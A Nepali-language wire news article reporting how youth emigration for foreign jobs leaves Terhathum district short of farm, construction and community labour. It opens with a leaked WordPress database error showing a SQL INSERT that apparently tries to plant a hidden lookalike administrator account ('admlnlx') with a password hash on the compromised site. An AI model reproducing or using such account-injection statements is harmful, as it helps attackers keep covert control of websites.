WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bgn/kNDnwDtEIGFKx2.PKfK76YitQC.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 00:09:45', '', 'admlnlx', 'admlnlx')
तेह्रथुम, माघ २५ –
रोजगारीका लागि गाउँका युवा विदेसिन थालेपछि अधिकांश गाउँमा काम गर्ने जनशक्तिको अभाव भएको छ ।
एकपछि अर्को गर्दै गाउँका युवा रोजगारीका लागि विदेसिँदा खेतबारीमा काम गर्ने मानिस पाइन छाडेको इवाका पूर्व गाविस अध्यक्ष डम्बरबहादुर इङनामले बताउनुभयो । “सबै युवा विदेशिएपछि काम गर्ने मान्छे नभएर खेतबारी बाँझै छन्,” उहाँले भन्नुभयो, “यस्तै हो भने अब केही वर्षभित्रै खेतबारी जति जङ्गलमा परिणत हुन्छन् ।”
गत वर्षसम्म रु १५० मा पाइने एकजना खेताला अहिले रु ५०० मा पनि पाइन छाडेका छन् । स्वदेशमा रोजगारीको अवसर नपाउँदा युवा गाउँमा भेटिन छाडेका छन् । युवा गाउँमा नभएपछि स्थानीय हाटबजार र मेला समेत बन्द हुन थालेको शुक्रबारेका नारायण सुब्बाले बताउनुभयो ।
“मलामी जाने मान्छेको अभाव हुुन थालेको छ, बुढापाकाले नै शव घाटसम्म पु¥याउनुपर्छ,” उहाँले भन्नुभयो । गाउँमा युवा नहँुदा सामाजिक कार्य गर्न समेत अप्ठ्यारो पर्न थालेको उहाँको भनाइ छ । विवाह, व्रतबन्ध, पुराणलागायत गाउँमा हुने सामाजिक कार्यमा सघाउने युुवा छैनन् । सबै काम बुढापाका र महिलाले गर्नुपर्ने अवस्था छ । स्थानीयस्तरका विकास निर्माणका काम समेत प्रभावित भएका छन् ।
भवन निर्माण, सडक खन्नेलगायत कामका लागि जनशक्ति पाइन छाडेको निर्माण व्यवसायी कमल ढुङ्गाना बताउनुहुन्छ । अहिले जिल्लामा सञ्चालित उद्योग र निर्माणका काममा तराई क्षेत्र र भारतको विहारबाट कामदार ल्याएर काम लगाउनु परेको व्यवसायी बताउँछन् । बाहिरबाट जनशक्ति मगाउँदा महङ्गो पर्ने हँुदा विकास निर्माणका कामको लागत पनि बढेको छ ।
म्याङलुङ क्याम्पसका सह–प्राध्यापक प्रकाश ढुङ्गाना उच्च तहसम्मको पढाइ सकेर रोजगारीका लागि खाडीमूलुक जानुपर्ने बाध्यतालाई नीतिगत तहबाटैै रोक्नुपर्ने बताउनुहुन्छ । दुईवटा नगरपालिका र २१ वटा गाविस रहेको जिल्लाको जनसङ्ख्या एक लाख एक हजार ५७७ मात्र छ । बेर्सेनि युवा रोजगार खोज्दै विदेश जाने प्रवृत्ति नरोकिए अबको पाँच वर्षमा गाउँमा युवा नभेटिने नागरिक समाजका अध्यक्ष तुलसी सङ्ग्रौला बताउँनुहुन्छ ।
जिल्ला प्रशासन कार्यलयका अनुसार दैनिक कम्तीमा १० जनाले राहादानी लिइरहेका छन् । आर्थिक वर्ष २०६९÷७० मा ९५० जनाले जिल्लाबाटै तथा चार हजार ५९४ जनाले काठमाडौँबाट राहदानी लिने गरी सिफारिस लिएका थिए । आव २०७०÷७१ मा एक हजार २२५ जनाले जिल्लाबाट र दुई हजार पाँच हजार ७७६ जनाले काठमाडौँबाट राहदानी लिने गरी सिफारिस लिएका छन् ।
यस्तै यस वर्ष राहदानी लिने सङ्ख्या बढेर चालु आवको पुस मसान्तसम्ममा एक हजार जना बढीले जिल्लाबाट तथा चार हजारभन्दा बढीले केन्द्रबाट राहदानी लिने गरी सिफारिस लिएका सहायक प्रमुख जिल्ला अधिकारी जयप्रकाश बस्नेतले बताउनुभयो । यही तथ्याङ्कलाई आधार मान्ने हो भने पनि करिब ५० प्रतिशत तेह्रथुमवासीले राहादानी बनाइसकेका छन् । – रासस